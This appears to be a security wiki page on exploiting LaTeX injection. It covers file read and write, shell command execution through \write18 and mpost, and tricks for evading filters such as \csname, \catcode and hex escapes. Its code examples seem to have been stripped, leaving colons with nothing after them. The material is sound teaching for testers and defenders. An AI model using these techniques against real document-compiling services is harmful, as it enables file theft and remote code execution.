LaTeX
A powerful language for text markup and document generation, but dangerous for user input
Last updated
A powerful language for text markup and document generation, but dangerous for user input
Last updated
is used in many different contexts, often to create complex expressions like formulas, but it can even create whole documents which is often seen in official research papers.
The basic syntax of LaTeX is referencing variables and commands by prefixing words with a \
backslash. To provide arguments to a command, use {}
curly braces to surround them. A full document always starts with some small boilerplate defining what type of document it is, and where its contents begin:
You can define commands yourself using the \newcommand
command, and use them throughout the document:
Result: Hello, world!
Use \renewcommand
instead if the command already exists, which will overwrite it
A .tex
file commonly gets compiled into a .pdf
file for publishing, which is as easy as running the pdflatex
command on the file:
During this compilation, all the code included in the source file is executed to generate the resulting PDF. As we will explore more in the Exploitation (Injection) section, there are some dangerous commands that a document may or may not run by the compiler. This depends on a few command-line flags with levels of restriction:
--shell-escape
: Enable \write18
completely, allowing any unrestricted shell commands
--shell-restricted
: Enable \write18
, but only certain predefined 'safe' commands (default)
--no-shell-escape
: Disable \write18
completely
LaTeX is very powerful and can do almost anything. From reading files to include in the document, to even writing files and executing system commands directly. Because of this, it is always dangerous to run user-provided code with LaTeX, and filter-based protection is hard to implement because of the complexity of the language and all the ways to bypass it.
There are a few special contexts where you may be able to inject. Depending on this, you may or may not be able to use certain commands, so it is important to understand how they work.
One useful command is \usepackage
to import LaTeX packages with extra functionality. This can only be used before \begin
in the "preamble". Trying to use it after will result in an error message. For example:
If your injection point is after here you will not be able to import new packages, and will have to do with already imported ones.
By surrounding text with $$
it becomes a formula in LaTeX, which looks slightly different and has different rules. One example I could find is the \url{}
command from the hyperref
package:
This gives a vague error "LaTeX Error: Command $ invalid in math mode", that can be fixed by escaping from the formula. Simply close it again with another $
in your input, perform the commands you want, and then finish again with another formula definition:
Let's start with exploiting. Without any special flags, LaTeX can read and include system files in the output, in a few different ways. One simple way is using \input
which runs and includes the specified file as more LaTeX code:
Another similar one is \include
with the difference being that it can only include .tex
files:
Both of the above methods include the content as LaTeX code, meaning any weird symbols may throw off the syntax. You may be able to fix parts of the syntax by prefixing it, but there might be cleaner ways designed to include raw data using packages
If the listings
package is included, you will have access to the \lstinputlisting
command which also reads the file from its argument:
Similarly, the verbatim
package also reads text literally:
A more manual way (without packages) is opening a file and reading its lines:
This method also executes content as LaTeX, meaning special characters like _
underscores may generate errors. We can patch some of these characters we find using \catcode
which changes the category of a character, into meaning a literal character:
Without any special flags, LaTeX can write any file to the system, which can lead to all kinds of problems. This is arguably the most dangerous default feature of LaTeX and why user input should never be trusted there. See #writing-files for some ideas on privilege escalation techniques.
Similarly to File read, you can open and write to a file:
Depending on the backend, you may be able to write or overwrite critical files like source code or templates to achieve full Remote Code Execution.
LaTeX is so powerful that it can execute system commands from its syntax, in multiple different ways. One is to use the \write18
command that accepts the command you wish to execute as the argument:
Another less common way is using \input
and the |
character:
As explained in Compiling, the list of allowed commands is very restricted by default. The examples above would only execute if --shell-escape
was turned on, allowing arbitrary commands.
The default allowed commands are stored in a big configuration file at /usr/share/texmf/web2c/texmf.cnf
where there are two interesting settings:
The shell_escape
setting determines the default option in the 3 levels explained above. In the restricted mode the shell_escape_commands
variable is used to select which commands are allowed as a comma-separated list. These commands should not allow you to do anything malicious, but there is a history of exploiting some of the functionality in these binaries to still perform some interesting actions.
If plain mpost
is allowed (default in earlier versions) the whole protection can be escaped by injecting commands (source). First, any parsable MetaPost file needs to be created to make the command not crash before our payload. This can be an existing file, or possibly a file you created yourself like via uploads:
Then the following mpost
arguments can execute arbitrary commands:
The example above executes id
, but trying a more complex command will run into escaping troubles because
spaces don't work. To make this easier, you can simply use ${IFS}
to replace the space and use Base64 to describe the real payload (CyberChef):
Inside of LaTeX, it would look like this:
Some dangers LaTeX commands might be blocked by a blacklist filter, which is hard to make because there are many tricks to circumvent such filters with alternative methods.
The following paper explores many different ideas for attacking LaTeX files and has some tricks to evading filters (4.5):
One powerful trick if commands are blocked using strings like "\input"
is to use \csname
which can represent a command without putting a \
in front of the command's name:
Another very powerful technique is using \catcode
to change the meaning (category) of characters. For example, we could change the X
character to mean "escape" just like \
would regularly. This is another way to evade filters that find commands prefixed with backslashes, but can also be used to replace any other special character (see the link for a list of values).
Using the special \makeatletter
(make @
letter) you can change the category code of specifically the @
character to use some special encodings of \input
:
Using ^^XX
hex escape sequences you can also represent any blocked characters literally, meaning that if this way is not blocked, you can evade any filter at all (CyberChef).
Lastly, by defining your own \begin
and \end
section, you can get arbitrary commands to be called. The argument in \begin
defines the command, and the text in between is the argument. This trick bypasses almost any \
blacklist because it only uses regular \begin
and \end
:
Tip: While one single of these techniques might not get straight through the filter, combining them can make it even more powerful. Try using one technique to set up another to obfuscate it for any detection there may be
A filter might try to prevent loops using \repeat
or similar functions, but forget that recursion is also an option. Here is a short command (named \l
) that creates a loop for N times, with the first argument being the number of loops, and the second argument being the code to execute:
This can for example be used to read lines in a file:
To read the entire file, you can also make the EOF stop the recursion inside the command: